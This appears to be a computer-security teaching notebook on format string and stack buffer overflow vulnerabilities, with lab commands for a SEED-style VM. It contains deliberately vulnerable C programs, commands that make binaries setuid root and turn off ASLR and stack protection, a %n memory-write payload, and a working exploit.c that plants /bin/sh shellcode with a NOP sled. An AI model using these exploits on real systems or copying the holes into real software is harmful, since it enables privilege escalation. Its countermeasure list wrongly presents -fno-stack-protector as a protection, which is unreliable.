## <center> Format String Vulnerability </center>

### Format String

- The family of `printf` function (`printf`, `fprintf`, `sprintf`...) allows users to print out a string according to a predefined format. 
- First argument in this function is called a *format string*. 
  - Normal characters within this string will be printed out as is. 
  - Characters preceded with special annocation (`%`) will be formatted according to a predefined conversion specifier. 

In [1]:
%%writefile source/printf_example.c
#include <stdio.h>

int main() 
{
    int i=1, j=2, k=3;

    printf("Hello World \n");
    printf("Print 1 number:  %d\n", i);
    printf("Print 2 numbers: %d, %d\n", i, j);
    printf("Print 3 numbers: %d, %d, %d\n", i, j, k);
}

Writing source/printf_example.c


Run the followings:

```
$ gcc -o printf_example Computer-Security/source/printf_example.c
$ ./printf_example
```

- `printf()` accepts any number of arguments. 
- https://linux.die.net/man/3/printf
- How?

In [4]:
%%writefile source/variable_args.c
#include <stdio.h>
#include <stdarg.h>

int myprint(int Narg, ... ) 
{
  int i;
  va_list ap;                              

  va_start(ap, Narg);                      
  for(i=0; i<Narg; i++) {
    printf("%d  ", va_arg(ap, int));       
    printf("%f\n", va_arg(ap, double));    
  }
  va_end(ap);                              
}

int main() {
  myprint(1, 2, 3.5);                      
  myprint(2, 2, 3.5, 3, 4.5);              
  return 1;
}

Overwriting source/variable_args.c


```
$ gcc -o variable_args Computer-Security/source/variable_args.c
$ ./variable_args
[11/23/18]seed@VM:~$ ./variable_args
2  3.500000
2  3.500000
3  4.500000
[11/23/18]seed@VM:~$
```

- `va_start()` initiates position of `ap`
- `va_arg()` reads and returns the value that `ap` is pointing to, also advances `ap` along the way. 

Run the followings:

```
$ gcc -g -o variable_args Computer-Security/source/variable_args.c
$ gdp variable_args
gdb-peda$ break 19
gdb-peda$ run
gdb-peda$ step
gdb-peda$ info args
gdb-peda$ x/dw Narg
gdb-peda$ x/dw Narg + 1
gdb-peda$ x/fg Narg + 2
gdb-peda$ x/dw Narg + 4
gdb-peda$ x/fg Narg + 5
```

- `x`: print value at memory position
- `d`: integer, signed decimal
- `f`: floating point number
- `w`: word (four bytes)
- `g`: giant word (eight bytes)

<center> <img src="figure/format-string/1.png" width="400"/>

- `variable_args` hard-coded the types for each argument in `myprint`. 
- `printf` embeds argument types into the initial string using `format specifies (%)`. 
  - `printf` scans the format string, prints out each character encountered, until it sees a format specifier. 
  - `printf` calls `va_arg()`, which returns the corresponding value pointed to by this specifier and advances the pointer to the next argument. 

```
int id = 100, age = 25;
char *name = "Bog Smith";
printf("ID: %d, Name: %s, Age: %d\n", id, name, age);
```
<center> <img src="figure/format-string/2.png" width="400"/>

- `%d`: Treat the argument as an *int* number (use the decimal form). 
- `%x`: Treat the argument as an *unsigned int* (use the hexadecimal form). 
- `%s`: Treat the argument as a *string pointer*. 
- `%f`: Treat the argument as a *double* number. 

### Format String with Missing Optional Arguments

In [8]:
%%writefile source/missing_args.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  printf ("ID: %d, Name: %s, Age: %d\n", id, name);    
  return 1;
}

Overwriting source/missing_args.c


In [7]:
%%writefile source/missing_args_v2.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  char *statement = "ID: %d, Name: %s, Age: %d\n"; 
  printf (statement, id, name);
  return 1;
}

Writing source/missing_args_v2.c


Compile and run the above examples. What is the difference?

<center> <img src="figure/format-string/3.png" width="400"/>

**Why is this dangerous?**

```
printf(user_input)
```

```
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);
```

```
sprintf(format, "%s %s", getenv("PWD"), ": %d");
printf(format, program_data);
```

Bad things can happen when you let users provide direct inputs to the format string. 

### A Vulnerable Program

In [12]:
%%writefile source/vul_format_string.c
#include <stdio.h>

void fmtstr()
{
    char input[100];
    int var = 0x11223344;                     
    /* print out information for experiment purpose */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);

    printf("Please enter a string: ");
    fgets(input, sizeof(input)-1, stdin);

    printf(input); // The vulnerable place

    printf("Data at target address: 0x%x\n",var);
}

void main() { fmtstr(); }


Overwriting source/vul_format_string.c


<center> <img src="figure/format-string/4.png" width="500"/>

Run the followings:

```
$ gcc -o vul Computer-Security/source/vul_format_string.c
$ sudo chown root vul
$ sudo chmod 4755 vul
$ sudo sysctl -w kernel.randomize_va_space=0
```

### Attack 1: Crash Program

- If we put several format specifiers in our input, we can get printf() to advance the `va_list` pointer to the places beyond the `printf()`'s stack frame. 
- If this runs into invalid address (nulll pointers, protected memory, virtual addresses not mapped to physical addresses ...), the program will crash.
- Try run `vul` with `%s%s%s` as an input. 

### Attack 2: Print out Data on the Stack

- `%x` print out the integer value pointed to by the `va_list` pointer and advanced `va_list` by four bytes. 
- How can you view what is in the program's memory using `%x` ?

### Attack 3: Change Program's Data in Memory

- All `printf()`'s format specifiers print out data, except `%n`, which writes the number of characters printed out so far into memory. 

In [15]:
%%writefile source/print_args.c
#include <stdio.h>
int main()
{
  int   i = 0;
  printf ("Hello World%n\n", &i);    
  printf ("Character Count: %d\n", i);
  return 1;
}

Overwriting source/print_args.c


When `printf()` encounters `%n`, it does the followings:

- get a value pointed to by the va_list pointer,
- treat this value as an address, and
- write to the memory at that address. 

If we need to write using `printf()`, the address of the memory needs to be on the stack. 

How do we place the desired address onto the stack?

- The vul program does print out the address location. 
- Address randomization is disabled. 
- We can save out input to a file, then *pipe* this content into `vul`:

```
$ echo $(printf "\x70\xea\xff\xbf").%x.%x.%x.%x.%x.%n | vul
```

- Changing the number of `%x` will lead to segmentation fault (`printf` tries to write with `%n` to invalid address)

- Replace **0XBFFFF304** with the corresponding output from **Target address**

<center> <img src="figure/format-string/5.png" width="500"/>

### Attack 4: Change Program's Data to a Specific Value

In [8]:
%%writefile source/strcpy_overflow.c
#include <string.h>

void foo(char *str)
{
    char buffer[12];

    /* The following statement will result in buffer overflow */ 
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";    
    foo(str);

    return 1;
}

Overwriting source/strcpy_overflow.c


Run the followings:
```
$ gcc -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the followings:
```
$ gcc -z execstack -fno-stack-protector -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

<center> <img src="figure/format-string/6.png" width="700"/>

### Attack 5: Inject Malicious Code

<center> <img src="figure/format-string/7.png" width="400"/>

- The region above the buffer includes critical values, including the return address and the previous frame pointer. 
- The consequences of a modified return address (due to buffer overflow) include:
  - The new address (virtual address) might not be mapped to any physical address, leading to an invalid return instruction and a crashed program. 
  - The address might be mapped to a physical address in protected system space, leading to a failed jump and a crashed program. 
  - The address might be mapped to a physical address that does not contain any valid instruction, leading to a failed return and a crashed program. 
  - **The address might be mapped to a physical address that happens to contain valid machine instructions, leading to a continuing program with logic different from the original program.**

#### Exploiting a Buffer Overflow Vulnerability

- By overflowing a buffer, we can cause the program to crash or run something else. 
- If the program is privileged, this means *something else* will be run with privilige, leading to potential privilege escalation for *something malicious*. 

In [2]:
%%writefile source/stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];
    printf ("I am here");
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}


Overwriting source/stack.c


- Clearly, there is a buffer overflow issue.
- What needs to be store in `badfile` to expoit this issue?

Disable countermeasures:
```
$ sudo sysctl -w kernel.randomize_va_space=0
```
Include the following flags with your gcc:
- `-z execstack`
- `-fno-stack-protector`

Run the followings:
```
$ gcc -o stack -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
$ echo "aaaa" > badfile
$ ./stack
$ echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" > badfile
$ ./stack
```

How do we know (guess) where the stack frame of `foo()` will be for us to find out where the malicious code is located (and hence set the relevant jump address)?
- Fixed starting address of the stack (before countermeasure). 
- The stack is shallow (good programming practice don't use deeply nested functions). 

Disable the address randomization and then run `mem_layout_print` to see if the addresses for the pointers in stack are changed?

How can we find the return address without guessing?

Run the followings:
```
$ gcc -g -o stack_dbg -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ rm badfile
$ touch badfile
$ gdb stack_dbg
gdb-peda$ break foo
gdb-peda$ run
gdb-peda$ print $ebp
gdb-peda$ print &buffer
gdb-peda$ print ebp - buffer
gdb-peda$ quit
```

- What is 0x6C in decimal?

The next body of code will need to be modified anytime you retest this program, after going through the debugging process to identify the correct stack position.

In [23]:
%%writefile source/exploit.c
/* exploit.c  */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax     */
    "\x50"                 /* pushl   %eax          */
    "\x68""//sh"           /* pushl   $0x68732f2f   */
    "\x68""/bin"           /* pushl   $0x6e69622f   */
    "\x89\xe3"             /* movl    %esp,%ebx     */
    "\x50"                 /* pushl   %eax          */
    "\x53"                 /* pushl   %ebx          */
    "\x89\xe1"             /* movl    %esp,%ecx     */
    "\x99"                 /* cdq                   */
    "\xb0\x0b"             /* movb    $0x0b,%al     */
    "\xcd\x80"             /* int     $0x80         */
;

void main(int argc, char **argv)
{
  char buffer[200];
  FILE *badfile;

  /* A. Initialize buffer with 0x90 (NOP instruction) */
  memset(&buffer, 0x90, 200);

  /* B. Fill the return address field with a candidate 
        entry point of the malicious code - This needs to be changed everytime you run the vulnerable program. 
        If this does not work, change x80 to a different value and try again. 
    
    */
  *((long *) (buffer + 112)) = 0xbfffe968 + 0x16;
	
  // C. Place the shellcode towards the end of buffer
  memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, 
         sizeof(shellcode));

  /* Save the contents to the file "badfile" */
  badfile = fopen("./badfile", "w");
  fwrite(buffer, 200, 1, badfile);
  fclose(badfile);
}

Overwriting source/exploit.c


### How serious is this vulnerability?

- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=format+string+
- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-format-string-vulnerability-in-ibm-db2-tool-db2support-cve-2018-1566/

### Countermeasures

#### General approaches

- Safer functions: specification of maximum data length to be copied
- Safer dynamic link library: dynamic link to safer libraries (as opposed to calling unsafe functions)
- Program static analyzer: warn of code patterns that could lead to buffer overflow
- Programming language: self-check against buffer overflow in the language
- Compiler: -fno-stack-protector
- Operating system: kernel.randomize_va_space